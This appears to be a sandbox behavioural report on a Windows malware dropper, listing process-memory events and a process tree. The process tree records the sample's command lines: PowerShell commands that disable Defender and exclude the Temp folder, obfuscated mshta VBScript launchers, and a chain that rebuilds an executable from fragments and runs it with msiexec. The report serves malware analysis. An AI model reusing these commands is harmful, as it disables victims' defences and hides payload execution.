N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1740 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3308 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 744 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe
PID 744 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3872 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 3020 wrote to memory of 3788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe
PID 4036 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe
PID 4036 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3324 -ip 3324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 596

C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$701EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4808 -ip 4808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 620

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$70114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 620

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1760 -ip 1760

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 640

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 788

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 756

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fffdd1fcc40,0x7fffdd1fcc4c,0x7fffdd1fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1724,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3292,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 852

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3764,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1328

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5016,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5048,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 660

C:\Windows\SysWOW64\WerFault.exe

